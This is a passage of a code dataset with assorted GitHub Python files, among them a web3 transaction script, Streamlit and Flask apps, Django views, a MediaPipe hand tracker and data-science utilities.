account_from[\"address\"] } to { address_to }'\n)\n\ntx_create = web3.eth.account.signTransaction(\n {\n \"nonce\": web3.eth.getTransactionCount(account_from[\"address\"]),\n \"gasPrice\": 20000000000,\n \"gas\": 1000000,\n \"to\": address_to,\n \"value\": web3.toWei(\"0.2\", \"ether\"),\n },\n account_from[\"private_key\"],\n)\n\nprint(\"Signed\")\ntx_hash = web3.eth.sendRawTransaction(tx_create.rawTransaction)\nprint(tx_hash.hex())\ntx_receipt = web3.eth.waitForTransactionReceipt(tx_hash)\nprint(f\"Transaction successful with hash: { tx_receipt.transactionHash.hex() }\")","repo_name":"MakC-Ukr/python-in-web3","sub_path":"transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42646384384","text":"# This code transfers all .gjf files to a newly created 'conformers' folder.\nimport os\nimport shutil\n\n# create new directory for .gjf files\nif not os.path.exists('conformers'):\n os.makedirs('conformers')\n\n# move all .gjf files to the new directory\nfor file in os.listdir('.'):\n if file.endswith('.gjf'):\n shutil.move(file, 'conformers/' + file)\n","repo_name":"woojin-lee-ucla/conformer_analysis_scripts","sub_path":"4 transfer .gjf .py","file_name":"4 transfer .gjf .py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20085924726","text":"#%%\n# 处理原始sina_cctv 数据集合\n# 该数据集为 微博列表页 数据,从该数据集中提取出需要爬取的 微博详情页\n# 下面开始数据清洗\nimport numpy as np\nimport pandas as pd \n\n#%%\ndef cleanNanValue(df):\n print(\"how many rows have Nan: \", df.isnull().sum())\n df = df.dropna(axis = \"rows\", how = \"all\")\n print(\"after clean Nan, the shape is: \", df.shape)\n return df\n\n\n#%%\ndataframeList = []\nfor i in range(11):\n csv_path = \"dataset/sina_cctv_raw_data/sina_cctv_list_\" + str(i + 1) + \".csv\"\n print(csv_path)\n dataframeList.append(pd.read_csv(csv_path))\n\nprint(len(dataframeList))\n\n#%%\ndataframeList[0] = cleanNanValue(dataframeList[0])\ndataframeList[0].shape \n\n#%%\nfor i in range(len(dataframeList)):\n dataframeList[i] = cleanNanValue(dataframeList[i])\n dataframeList[i].to_csv(\"dataset/sina_cctv_processed_data/sina_cctv_list_\" + str(i + 1) + \".csv\")\n\n","repo_name":"MineSelf2016/SummerResearch","sub_path":"process/cleanNanValue.py","file_name":"cleanNanValue.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25134990063","text":"\r\nimport streamlit as st\r\nimport pandas as pd\r\nfrom mlxtend.frequent_patterns import apriori, association_rules\r\nimport openpyxl\r\n# Load the association rules data\r\ndf = pd.read_excel('Online Retail.xlsx')\r\ndf['Description'] = df['Description'].str.strip()\r\n\r\ncountries = df['Country'].unique()\r\ncountries = countries[countries != 'United Kingdom']\r\ncountry = st.selectbox(\"Select a country\", countries)\r\n\r\n# Transaction for the selected country\r\nBasket_Country = (df[df['Country'] == country]\r\n .groupby(['InvoiceNo', 'Description'])['Quantity']\r\n .sum().unstack().reset_index().fillna(0)\r\n .set_index('InvoiceNo'))\r\n\r\ndef hot_encoder(x):\r\n if x <= 0:\r\n return 0\r\n if x >= 1:\r\n return 1\r\n\r\nBasket_Encoded = Basket_Country.applymap(hot_encoder)\r\nBasket_Country = Basket_Encoded\r\n\r\n# Applying apriori algorithm for the selected country\r\nfreq_items = 
apriori(Basket_Country, min_support=0.01, use_colnames=True)\r\n\r\n# Applying association rule\r\nrules = association_rules(freq_items, metric=\"lift\", min_threshold=1)\r\nrules = rules.sort_values(['confidence', 'lift'], ascending=[False, False])\r\n\r\n# Create a Streamlit app\r\ndef main():\r\n st.title(\"Top Association Rules for {}\".format(country))\r\n \r\n # Display the products to promote\r\n st.subheader(\"Products to Promote\")\r\n promote_products = rules[rules['antecedents'].apply(lambda x: len(x) == 1)]\r\n promote_products = promote_products.rename(columns={'antecedents': 'products'})\r\n if 'products' in promote_products.columns:\r\n st.dataframe(promote_products['products'])\r\n else:\r\n st.write(\"No 'products' column found in promote_products DataFrame.\")\r\n\r\n # Display the cross-selling opportunities\r\n st.subheader(\"Cross-Selling Opportunities\")\r\n cross_sell_products = rules[rules['antecedents'].apply(lambda x: len(x) > 1)]\r\n cross_sell_products = cross_sell_products.rename(columns={'antecedents': 'products'})\r\n if 'products' in cross_sell_products.columns:\r\n pd.set_option('display.max_colwidth', None)\r\n st.dataframe(cross_sell_products['products']) \r\n else:\r\n st.write(\"No 'products' column found in cross_sell_products DataFrame.\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"moatazsaad/market","sub_path":"streamlit_apriori.py","file_name":"streamlit_apriori.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75162502568","text":"from station_schema import StationSchema\nimport unittest\nfrom unittest import TestCase\n\n\nclass SchemaTestCase(TestCase):\n def setUp(self):\n self.station_schema = StationSchema()\n self.test_data = {\n \"@id\": \"http://environment.data.gov.uk/flood-monitoring/id/stations/SJ37_030\",\n \"eaRegionName\": \"North West\",\n \"gridReference\": \"SJ3073\",\n \"label\": \"Burton Point Deep\",\n \"measures\": {\n \"@id\": \"http://environment.data.gov.uk/flood-monitoring/id/measures/SJ37_030-level-groundwater-i-1_h-m\",\n \"label\": \"Burton Point Deep - level-groundwater-i-1_h-m\",\n \"latestReading\": {\n \"@id\": \"http://environment.data.gov.uk/flood-monitoring/data/readings/SJ37_030-level-groundwater-i-1_h-m/2022-06-07T02-00-00Z\",\n \"date\": \"2022-06-07\",\n \"dateTime\": \"2022-06-07T02:00:00Z\",\n \"measure\": \"http://environment.data.gov.uk/flood-monitoring/id/measures/SJ37_030-level-groundwater-i-1_h-m\",\n \"value\": 0.479,\n },\n \"notation\": \"SJ37_030-level-groundwater-i-1_h-m\",\n \"parameter\": \"level\",\n \"parameterName\": \"Water Level\",\n \"period\": 3600,\n \"qualifier\": \"Groundwater\",\n \"station\": \"http://environment.data.gov.uk/flood-monitoring/id/stations/SJ37_030\",\n \"stationReference\": \"SJ37_030\",\n \"type\": [\n \"http://environment.data.gov.uk/flood-monitoring/def/core/Measure\",\n \"http://environment.data.gov.uk/flood-monitoring/def/core/WaterLevel\",\n ],\n \"unit\": \"http://qudt.org/1.1/vocab/unit#Meter\",\n \"unitName\": \"m\",\n \"valueType\": \"instantaneous\",\n },\n \"notation\": \"SJ37_030\",\n \"stationReference\": \"SJ37_030\",\n \"type\": \"http://environment.data.gov.uk/flood-monitoring/def/core/Station\",\n }\n\n self.expected_result = {\n \"gridReference\": \"SJ3073\",\n \"label\": \"Burton Point Deep\",\n \"measures_label\": \"Burton Point Deep - level-groundwater-i-1_h-m\",\n \"measure_value\": 0.479,\n \"measure_date_time\": 
\"2022-06-07T02:00:00Z\",\n \"measure_date\": \"2022-06-07\",\n \"measures_notation\": \"SJ37_030-level-groundwater-i-1_h-m\",\n \"measures_parameter\": \"level\",\n \"measures_parameterName\": \"Water Level\",\n \"measures_period\": \"3600\",\n \"measures_qualifier\": \"Groundwater\",\n \"measures_valueType\": \"instantaneous\",\n \"stationReference\": \"SJ37_030\",\n }\n\n def test_dump(self):\n print(\"This called\")\n result = self.station_schema.dump(self.test_data)\n self.assertEquals(result, self.expected_result)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"damilareisaac/flood_monitoring_data_pipeline","sub_path":"schema/test_schema.py","file_name":"test_schema.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4546986330","text":"from tkinter import W\nimport unittest\nimport parseStruct\nimport print_format\n\nclass TestStructToPrintf(unittest.TestCase):\n def test_parse_struct(self):\n fileName = './test_sample_header.h'\n dic = parseStruct.parseStruct(fileName)\n expect = {'HOGE2': {'a': 'long', 'b': 'HOGE', 'c': 'float'},'HOGE': {'a': 'int', 'b': 'char*'}} \n self.assertDictEqual(dic, expect)\n\n def test_print_format(self):\n fileName = './test_sample_header.h'\n dic = parseStruct.parseStruct(fileName)\n ret = print_format.createPrintFormat(dic)\n expect = ['printf(\"%s a:%d b:%s\", \"HOGE\", info.a, info.b);', 'printf(\"%s a:%ld b:%s c:%f\", \"HOGE2\", info.a, info.b, info.c);']\n self.assertEqual(ret, expect)\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"maruhiko/c-util","sub_path":"StructToPrintf/test_struct_to_printf.py","file_name":"test_struct_to_printf.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39895310617","text":"import tkinter as tk\nfrom dataclasses import dataclass\nimport rsa\nimport viziner\n\n\n@dataclass\nclass Text:\n value: tk.Entry\n salt: tk.Entry\n rsa_first: tk.Entry\n rsa_second: tk.Entry\n\n def __init__(self):\n self.salt = None\n self.value = None\n self.rsa_first = None\n self.rsa_second = None\n\n\nwindow = tk.Tk()\nwindow.wm_title(\"mod23\")\nwidth_m = 50\nentrys = Text()\n\n\ndef add_gap():\n label_gap = tk.Label(\n height=1,\n width=width_m\n )\n label_gap.pack()\n\n\ndef convert():\n add_gap()\n label_num.pack()\n entrys.value.pack()\n add_gap()\n label_salt.pack()\n entrys.salt.pack()\n add_gap()\n label_rsa.pack()\n entrys.rsa_first.pack()\n entrys.rsa_second.pack()\n btn_generate.pack()\n label_num_with_salt_cipher_text.pack()\n add_gap()\n label_num_with_salt_cipher.pack()\n add_gap()\n label_errors.pack()\n\n\ndef button_click():\n if not entrys.value.get().isascii():\n label_errors[\"text\"] = \"Text wrong\"\n return\n\n if not entrys.salt.get().isascii():\n label_errors[\"text\"] = \"Slat wrong\"\n return\n\n if not entrys.rsa_first.get().isdigit():\n label_errors[\"text\"] = \"First RSA wrong\"\n return\n\n if not entrys.rsa_second.get().isdigit():\n label_errors[\"text\"] = \"Second RSA wrong\"\n return\n label_errors[\"text\"] = \"\"\n\n try:\n public = (int(entrys.rsa_first.get()), int(entrys.rsa_second.get()))\n salt = entrys.salt.get()\n text = entrys.value.get()\n temp = viziner.cipher(text, salt)\n label_num_with_salt_cipher.delete(1.0, tk.END)\n label_num_with_salt_cipher.insert(1.0, rsa.encrypt(public, temp))\n except Exception as e:\n label_errors[\"text\"] = 
str(e)\n\n\nbtn_generate = tk.Button(\n text=\"cipher\",\n command=button_click\n)\n\nlabel_num = tk.Label(\n text=\"Enter num\",\n fg=\"black\",\n bg=\"white\",\n width=width_m,\n)\n\nentrys.value = tk.Entry(\n width=width_m\n)\n\nlabel_salt = tk.Label(\n text=\"Enter a salt\",\n fg=\"black\",\n bg=\"white\",\n width=width_m,\n)\n\nentrys.salt = tk.Entry(\n width=width_m\n)\n\nlabel_rsa = tk.Label(\n text=\"Enter RSA public keys\",\n fg=\"black\",\n bg=\"white\",\n width=width_m,\n)\n\nentrys.rsa_first = tk.Entry(\n width=width_m\n)\n\nentrys.rsa_second = tk.Entry(\n width=width_m\n)\n\nlabel_num_with_salt_cipher_text = tk.Label(\n text=\"Num with salt cipher\",\n fg=\"black\",\n bg=\"white\",\n width=width_m,\n)\n\nlabel_num_with_salt_cipher = tk.Text(\n height=5,\n fg=\"black\",\n bg=\"white\",\n width=width_m\n)\n\nlabel_errors = tk.Label(\n height=1,\n width=width_m\n)\n\nconvert()\nwindow.mainloop()\n","repo_name":"nedoletoff/suaiIDEA","sub_path":"lab3/mod23.py","file_name":"mod23.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31265244614","text":"# If we list all the natural numbers below 10 that are multiples of 3 or 5,\n# we get 3, 5, 6 and 9. The sum of these multiples is 23.\n\n# Find the sum of all the multiples of 3 or 5 below 1000.\n\nadder = 0\ni = 0\nfor i in range(1000):\n if (i % 3 == 0):\n adder += i\n else:\n if (i % 5 == 0):\n adder += i\nprint(str(adder))\n","repo_name":"schaefer-dev/Project-Euler","sub_path":"python/problem001.py","file_name":"problem001.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35327010051","text":"import os\n\nfrom flask import Flask, jsonify, redirect\nfrom werkzeug.exceptions import HTTPException\n\n\ndef create_app(\n instance_path=None,\n static_folder='../frontend/build'\n):\n app = Flask(__name__,\n instance_path=instance_path,\n static_url_path='/',\n static_folder=static_folder,\n instance_relative_config=True)\n\n # Apply API blueprints\n from labelling.notebook import api_files\n app.register_blueprint(api_files.bp)\n # app.register_blueprint(other_api.bp)\n\n @app.errorhandler(ValueError)\n def http_error_handler(error):\n return jsonify(code=400, message=str(error)), 400\n\n @app.errorhandler(HTTPException)\n def http_exception_handler(error):\n return jsonify(code=error.code, message=error.description), error.code\n\n @app.route('/')\n def home():\n return redirect('/index.html', code=302)\n\n _init_temp_dir(app)\n return app\n\n\ndef _init_temp_dir(app):\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n","repo_name":"wanasit/labelling-notebook","sub_path":"labelling/notebook/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4488368501","text":"\"\"\"Test module to test the base downloader with a zip file case.\"\"\"\nfrom downloaders import BaseDownloader\n\n\ndef test_base_downloader_zip_case():\n \"\"\"Test the base downloader with a zip file case.\"\"\"\n root = \"tests/downloads\"\n urls = [\n \"https://github.com/LucaCappelletti94/downloaders/blob/main/tests/data/data.zip?raw=true\",\n ]\n downloader = BaseDownloader(\n target_directory=root,\n )\n 
downloader.download(urls)\n","repo_name":"LucaCappelletti94/downloaders","sub_path":"tests/test_base_downloader_zip_case.py","file_name":"test_base_downloader_zip_case.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"42724388958","text":"__AUTHOR__ = \"lambdalisue (lambdalisue@hashnote.net)\"\nimport logging\n\nfrom django.db.models.signals import pre_save\n\nfrom .conf import settings\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef pre_save_callback(sender, instance, **kwargs):\n from . import get_backend\n\n if (\n hasattr(instance._meta, \"app_label\")\n and \"%s.%s\" % (instance._meta.app_label, instance._meta.model_name)\n in settings.AUTHOR_IGNORE_MODELS\n ):\n return\n if not hasattr(instance, settings.AUTHOR_CREATED_BY_FIELD_NAME):\n return\n # get current user via author backend\n user = get_backend().get_user()\n if settings.AUTHOR_DO_NOT_UPDATE_WHILE_USER_IS_NONE and user is None:\n return\n if getattr(instance, settings.AUTHOR_CREATED_BY_FIELD_NAME) is None:\n setattr(instance, settings.AUTHOR_CREATED_BY_FIELD_NAME, user)\n if not getattr(\n instance, \"_change_updated_by\", True\n ): # User forbids modifying the updated_by field\n return\n if hasattr(instance, settings.AUTHOR_UPDATED_BY_FIELD_NAME):\n setattr(instance, settings.AUTHOR_UPDATED_BY_FIELD_NAME, user)\n\n\ndef register():\n if settings.AUTHOR_MODELS:\n for model in settings.AUTHOR_MODELS:\n app_label, model = model.split(\".\", 1)\n from django.contrib.contenttypes.models import ContentType\n\n ct = ContentType.objects.get_by_natural_key(app_label, model)\n pre_save.connect(pre_save_callback, sender=ct.model_class())\n else:\n pre_save.connect(pre_save_callback)\n","repo_name":"lambdalisue/django-author","sub_path":"author/receivers.py","file_name":"receivers.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"53"} +{"seq_id":"3500503765","text":"import mediapipe as mp\r\nimport numpy as np\r\nimport cv2 as cv\r\nimport math\r\n\r\nclass HandDetector:\r\n def __init__(self, mode=False, maxHands=1, modelComplexity=1,\r\n detectionConf=0.5, trackingConf=0.5):\r\n #\r\n self.__mode = mode\r\n self.__maxHands = maxHands\r\n self.__modelComplexity = modelComplexity\r\n self.__detectionConf = detectionConf\r\n self.__trackingConf = trackingConf\r\n #\r\n self.mpDraw = mp.solutions.drawing_utils\r\n self.mpHands = mp.solutions.hands\r\n self.hands = self.mpHands.Hands(self.__mode, self.__maxHands, self.__modelComplexity,\r\n self.__detectionConf, self.__trackingConf)\r\n\r\n\r\n def __find_results(self, img):\r\n img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\r\n img.flags.writeable = False\r\n self.results = self.hands.process(img)\r\n\r\n def draw_all_landmarks(self, img, jointColor=(0,0,0), lineColor=(255,255,255),\r\n jointThickness=2, lineThickness=1):\r\n self.__find_results(img)\r\n if self.results.multi_hand_landmarks:\r\n for hand in self.results.multi_hand_landmarks:\r\n self.mpDraw.draw_landmarks(img, hand, self.mpHands.HAND_CONNECTIONS,\r\n self.mpDraw.DrawingSpec(color=jointColor, thickness=jointThickness, circle_radius=4),\r\n self.mpDraw.DrawingSpec(color=lineColor, thickness=lineThickness, circle_radius=2))\r\n\r\n def locate_landmarks(self, img, flip=False, draw=False):\r\n self.__img = img # created an instance variable for future uses\r\n self.__flip = flip # created an instance variable for future uses\r\n\r\n h, w, _ = 
self.__img.shape\r\n final = []\r\n\r\n self.__find_results(img)\r\n\r\n if self.results.multi_hand_landmarks: # if it is not empty\r\n for handType, landmarks in zip(self.results.multi_handedness, self.results.multi_hand_landmarks):\r\n myHand = {} # will hold the landmarks and hand side (left or right)\r\n lmList = [] # will hold the coordinates(x,y,z) of landmarks\r\n\r\n # Calculating x,y,z positions of all landmarks\r\n for lm in landmarks.landmark:\r\n px, py, pz = int(lm.x * w), int(lm.y * h), int(lm.z * w * -1)\r\n lmList.append([px, py, pz])\r\n myHand[\"landmarks\"] = lmList\r\n\r\n # Calculating the hand side (left or right)\r\n if flip:\r\n if handType.classification[0].label == \"Right\":\r\n myHand[\"label\"] = \"R\"\r\n else:\r\n myHand[\"label\"] = \"L\"\r\n else:\r\n if handType.classification[0].label == \"Right\":\r\n myHand[\"label\"] = \"L\"\r\n else:\r\n myHand[\"label\"] = \"R\"\r\n\r\n final.append(myHand)\r\n return final\r\n\r\n def calculate_distance(self, p1, p2, draw=False):\r\n x1, y1 = p1[0], p1[1] # assigning starting point variables\r\n x2, y2 = p2[0], p2[1] # assigning end point variables\r\n length = math.hypot(x2 - x1, y2 - y1) # calculating the length between points\r\n\r\n if draw:\r\n cv.circle(self.__img, (x1, y1), 10, (255, 255, 255), -1)\r\n cv.circle(self.__img, (x2, y2), 10, (255, 255, 255), -1)\r\n cv.line(self.__img, (x1, y1), (x2, y2), (0, 0, 0), 3)\r\n\r\n return length\r\n\r\n def hand_and_finger_positions(self, hand, mode=2):\r\n lmList = hand[\"landmarks\"]\r\n label = hand[\"label\"]\r\n\r\n fingerPos = [None,None,None,None,None]\r\n handPos = {\"FIST\":None, \"GRIP\":None}\r\n\r\n # For Thumb\r\n if self.__flip:\r\n if label == \"R\": sit0 = lmList[4][0] > lmList[2][0]\r\n elif label == \"L\": sit0 = lmList[4][0] < lmList[2][0]\r\n elif not self.__flip:\r\n if label == \"R\": sit0 = lmList[4][0] < lmList[2][0]\r\n elif label == \"L\": sit0 = lmList[4][0] > lmList[2][0]\r\n\r\n # Level 1\r\n sit1 = lmList[8][1] > lmList[7][1]\r\n sit2 = lmList[12][1] > lmList[11][1]\r\n sit3 = lmList[16][1] > lmList[13][1]\r\n sit4 = lmList[20][1] > lmList[19][1]\r\n # Level 2\r\n sit5 = lmList[8][1] > lmList[6][1]\r\n sit6 = lmList[12][1] > lmList[10][1]\r\n sit7 = lmList[16][1] > lmList[14][1]\r\n sit8 = lmList[20][1] > lmList[18][1]\r\n # Level 3\r\n sit9 = lmList[8][1] > lmList[5][1]\r\n sit10 = lmList[12][1] > lmList[9][1]\r\n sit11 = lmList[16][1] > lmList[13][1]\r\n sit12 = lmList[20][1] > lmList[17][1]\r\n\r\n finger0_down = sit0\r\n finger1_down = sit1 and sit5\r\n finger2_down = sit2 and sit6\r\n finger3_down = sit3 and sit7\r\n finger4_down = sit4 and sit8\r\n\r\n finger0_up = not finger0_down\r\n finger1_up = not finger1_down\r\n finger2_up = not finger2_down\r\n finger3_up = not finger3_down\r\n finger4_up = not finger4_down\r\n\r\n if finger0_up: fingerPos[0] = 1\r\n elif finger0_down: fingerPos[0] = 0\r\n if finger1_up: fingerPos[1] = 1\r\n elif finger1_down: fingerPos[1] = 0\r\n if finger2_up: fingerPos[2] = 1\r\n elif finger2_down: fingerPos[2] = 0\r\n if finger3_up: fingerPos[3] = 1\r\n elif finger3_down: fingerPos[3] = 0\r\n if finger4_up: fingerPos[4] = 1\r\n elif finger4_down: fingerPos[4] = 0\r\n\r\n if sit0 and sit9 and sit10 and sit11 and sit12: handPos[\"FIST\"] = True\r\n else: handPos[\"FIST\"] = False\r\n\r\n return fingerPos, handPos\r\n\r\n\r\n","repo_name":"informaticacba/Medipipe-Projects","sub_path":"Hand 
Tracking/Hand_Tracking_Module.py","file_name":"Hand_Tracking_Module.py","file_ext":"py","file_size_in_byte":5735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37100166547","text":"import sys\nimport argparse\n\n# Simply prints the content of the file to the console\ndef print_file_content(file):\n for line in file:\n print(line.rstrip())\n\ndef helper(output_file, *lines):\n with open(output_file, \"w\") as file_object:\n for line in lines:\n if type(line) is list:\n for element in line:\n if not element.endswith(\"\\n\"):\n file_object.write(element + \"\\n\")\n else:\n file_object.write(element)\n else:\n file_object.write(line)\n\n# Writes a list of strings to the output_file.\ndef write_list_to_file(output_file,lst):\n with open(output_file, \"w\") as file_object:\n for line in lst:\n file_object.write(line)\n\n# Reads an entire file to a list of strings.\ndef read_file(input_file):\n with open(input_file) as file_object:\n contents = file_object.readlines()\n return(contents)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"A Program that reads a file from CLI and writes it to the console and an output-file\")\n parser.add_argument('--output',help=\"Name of the file to which the output will be written.\")\n parser.add_argument('--file', default=\"input.txt\", help=\"Name of the file which should be opened.\")\n args, unknown = parser.parse_known_args()\n file = read_file(args.file)\n if args.output is None:\n print_file_content(file)\n for element in unknown:\n print(element + \"\\n\")\n else:\n helper(args.output, file, unknown)","repo_name":"Paepke-cph/PythonNotebooks","sub_path":"week2/02-Exercise-1.py","file_name":"02-Exercise-1.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11408474246","text":"from django.shortcuts import render, redirect\nfrom .models import Order, Product\n\ndef index(request):\n context = {\n \"all_products\": Product.objects.all()\n }\n return render(request, \"store/index.html\", context)\n\ndef order(request):\n price_from_form = Product.objects.get(id = request.POST['product_id']).price\n quantity_from_form = int(request.POST[\"quantity\"])\n total_charge = quantity_from_form * price_from_form\n order = Order.objects.create(quantity_ordered=quantity_from_form, total_price=total_charge)\n return redirect(f'/checkout/{order.id}')\n\ndef checkout(request, order_id):\n order = Order.objects.get(id=order_id)\n all_orders = Order.objects.all()\n\n all_orders_price = 0\n all_orders_total_quantity = 0\n\n for order in all_orders:\n all_orders_price += order.total_price\n all_orders_total_quantity += order.quantity_ordered\n\n context = {\n 'quantity' : order.quantity_ordered,\n 'charged' : order.total_price,\n 'all_orders_price' : all_orders_price,\n 'all_orders_total_quantity' : all_orders_total_quantity\n }\n return render(request, \"store/checkout.html\", context)","repo_name":"tringakrasniqi/amadon","sub_path":"apps/poorly_coded_store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24031301931","text":"\"\"\"\nA package that carries miscellaneous utilities.\n\"\"\"\n# standard imports\nfrom datetime import datetime\nfrom pathlib import PurePath\nimport logging\nimport os\n\n# DS imports\nimport pandas as pd\nimport numpy as np\n\n# Third-Party 
imports\nfrom scipy.stats import spearmanr, pearsonr\nfrom sklearn.preprocessing import MinMaxScaler\nimport imblearn.under_sampling as uns\n\n# imblearn imports\nfrom imblearn.over_sampling import SMOTE, BorderlineSMOTE, SVMSMOTE, ADASYN\nfrom imblearn.combine import SMOTETomek, SMOTEENN\n\n# feature selectors\nfrom boruta import BorutaPy\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import f_regression, RFE\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom sklearn.feature_selection import chi2\n\n# models\nfrom sklearn.ensemble import RandomForestRegressor, AdaBoostRegressor\n\n\ndef calc_correlations(\n df, target, output_filepath=\"results/correlations\", verbose=False\n):\n \"\"\"\n Calculates Pearson and Spearman correlations per target and dumps it in a csv file.\n :param df: Df with data\n :param target: target variable\n :param output_filepath: output file path\n :param verbose: verbosity of function\n \"\"\"\n corr_pear = []\n corr_spear = []\n for i in range(len(df.columns)):\n pear, _ = pearsonr(df[df.columns[i]], df[df.columns[0]])\n corr_pear.append(pear)\n spear, _ = spearmanr(df[df.columns[i]], df[df.columns[0]])\n corr_spear.append(spear)\n df_corr = pd.DataFrame(\n list(zip(df.columns, corr_pear, corr_spear)),\n columns=[\"col\", \"pearson_corr\", \"spearman_corr\"],\n )\n if verbose:\n print(df_corr.sort_values(\"pearson_corr\", ascending=False))\n print(df_corr.sort_values(\"spearman_corr\", ascending=False))\n\n file_name = \"_Correlations\" + str(target) + \".csv\"\n file_path = PurePath(output_filepath)\n df_corr.to_csv(file_path.joinpath(file_name))\n\n\n# helper function to calculate the age of a person\ndef calculate_age(born, ref_date='2019-09-14'):\n \"\"\"\n Helper Function to calculate the age.\n \"\"\"\n born = pd.to_datetime(born)\n today = (\n datetime.strptime(ref_date, '%Y-%m-%d')\n if ref_date is not None\n else pd.to_datetime(\"today\")\n )\n return (today - born) / np.timedelta64(1, \"Y\")\n\n\ndef binning(df, col, bins=None, labels=None, verbose=False):\n \"\"\"\n Bins a given column from a dataframe\n :param df: Dataframe\n :param col: column to be binned\n :param labels: label of bins\n :param bins: bins\n :param verbose: verbosity\n :return:\n \"\"\"\n if labels is None:\n labels = [0, 1, 2]\n if bins is None:\n bins = [0, 3, 10, 12]\n df[col] = pd.cut(x=df[col], bins=bins, labels=labels)\n if verbose:\n print(df[col].value_counts())\n return df\n\n\ndef df_to_csv(df, directory, file_name):\n \"\"\"\n Dumps a pandas DF to csv. 
Only works if directory is present in the current working directory.\n :param df: DF to be dumped\n :param directory: directory to dump in to\n :param file_name: file name\n \"\"\"\n directory = PurePath(directory)\n file_path = directory.joinpath(file_name)\n try:\n os.mkdir(directory)\n except FileExistsError:\n pass\n df.to_csv(file_path)\n logging.info(\"{} was dumped on disc.\".format(file_path))\n\ndef _RFE(X,y,no_features = 10):\n '''\n\n :param X: input test data\n :param y: input test data target\n :param no_features: number of features to select\n :return: list of features selected\n '''\n selector = RFE(estimator=DecisionTreeClassifier(), n_features_to_select=no_features)\n X = selector.fit(X,y)\n features = list(X.support_)\n return features\n\n\n# Sampling Methods\n# TODO: Finish refactoring sampling methods\ndef _SMOTE(seed, X, y, target, k_neighbors=3):\n \"\"\"\n Oversampling - SMOTE - Synthetic Minority Over-sampling Technique\n :param seed:\n :param X:\n :param y:\n :param target:\n :param k_neighbors:\n :return:\n \"\"\"\n\n # TODO: Marius: Should the original frame be concatenated with the new frames?\n smote = SMOTE(k_neighbors=k_neighbors, random_state=seed) # sampling_strategy=0.8\n X_smote, y_smote = smote.fit_resample(X, y)\n\n X_smote = pd.DataFrame(X_smote, columns=X.columns)\n y_smote = pd.DataFrame(y_smote, columns=[target])\n\n pos_before = y.sum()\n pos_after = y_smote.sum()\n\n logging.info(\n \"Observations before applying SMOTE: {} and after applying SMOTE {}\".format(\n X.shape[0], X_smote.shape[0]\n )\n )\n logging.info(\n \"Number positives before/after SMOTE: {}/{}.\".format(pos_before, pos_after)\n )\n\n return X_smote, y_smote\n\n\ndef _SMOTE_Border(self):\n # Oversampling - SMOTE - Synthetic Minority Over-sampling Technique\n\n print(\"before SMOTE df\", self.x_train.shape)\n smote = BorderlineSMOTE(\n k_neighbors=5, m_neighbors=5, random_state=self.seed\n ) # sampling_strategy=0.8\n self.X_train_smote, self.y_train_smote = smote.fit_sample(\n self.x_train, self.y_train\n )\n print(\"X_train_SMOTE:\\n\", self.X_train_smote[1])\n\n self.x_train = pd.DataFrame(self.X_train_smote, columns=self.x_train.columns)\n self.y_train = pd.DataFrame(\n self.y_train_smote, columns=[\"Local Relapse Y(1) /N(0)\"]\n )\n\n print(\"len smote: \\n\", len(self.X_train_smote))\n print(\"len new x_train: \\n\", len(self.x_train))\n\n number_pos_x = self.y_train.loc[self.y_train[\"Local Relapse Y(1) /N(0)\"] == 1]\n print(\"number positive responses y_train:\\n\", len(number_pos_x))\n\n\ndef _SMOTE_SVM(self):\n # Oversampling - SMOTE - Synthetic Minority Over-sampling Technique\n # print('before SMOTE df', self.x_train)\n print(\"before SMOTE df\", self.x_train.shape)\n smote = SVMSMOTE(\n k_neighbors=5, m_neighbors=5, random_state=self.seed\n ) # sampling_strategy=0.8\n self.X_train_smote, self.y_train_smote = smote.fit_sample(\n self.x_train, self.y_train\n )\n print(\"X_train_SMOTE:\\n\", self.X_train_smote[1])\n\n self.x_train = pd.DataFrame(self.X_train_smote, columns=self.x_train.columns)\n self.y_train = pd.DataFrame(\n self.y_train_smote, columns=[\"Local Relapse Y(1) /N(0)\"]\n )\n\n # print('len smote: \\n', len(self.X_train_smote))\n print(\"len new x_train after smote: 